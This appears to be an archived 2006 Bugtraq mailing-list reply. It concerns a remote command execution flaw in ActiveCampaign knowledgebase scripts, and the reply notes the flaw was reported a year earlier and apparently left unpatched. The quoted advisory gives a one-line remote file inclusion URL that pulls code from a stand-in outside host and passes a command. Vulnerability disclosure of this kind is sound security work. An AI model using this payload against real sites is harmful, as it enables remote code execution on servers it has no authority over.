[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Knowledgebases Remote Command Exucetion

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Re: Knowledgebases Remote Command Exucetion
From: security curmudgeon <jericho@xxxxxxxxxxxxx>
Date: Tue, 28 Feb 2006 23:55:14 -0500 (EST)

: http://www.activecampaign.com/support/
: 
: Version :   1-2-All KB
:            * KnowledgeBuilder KB
:            * iSalient KB
:            * SupportTrio KB
:            * visualEdit KB
:            * General KB
: 
: This is a support-faq script. The questions is asked. But this a script 
: high the risk at bug. Malicios person to reach far away.
: 
: Vulnerable :
: 
: http://www.site.com/[path]/index.php?page=http://evilcode?&cmd=

This was reported on Mar 12, 2005 by Francisco Alisson, and apparently not 
patched since then.

http://archives.neohapsis.com/archives/bugtraq/2005-03/0213.html

Prev by Date: Re: [Full-disclosure] Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities
Next by Date: Secunia Research: Lighttpd Script Source Disclosure Vulnerability
Previous by thread: [eVuln] Leif M. Wright's Blog Multiple Vulnerabilities
Next by thread: Secunia Research: Lighttpd Script Source Disclosure Vulnerability
Index(es):
- Date
- Thread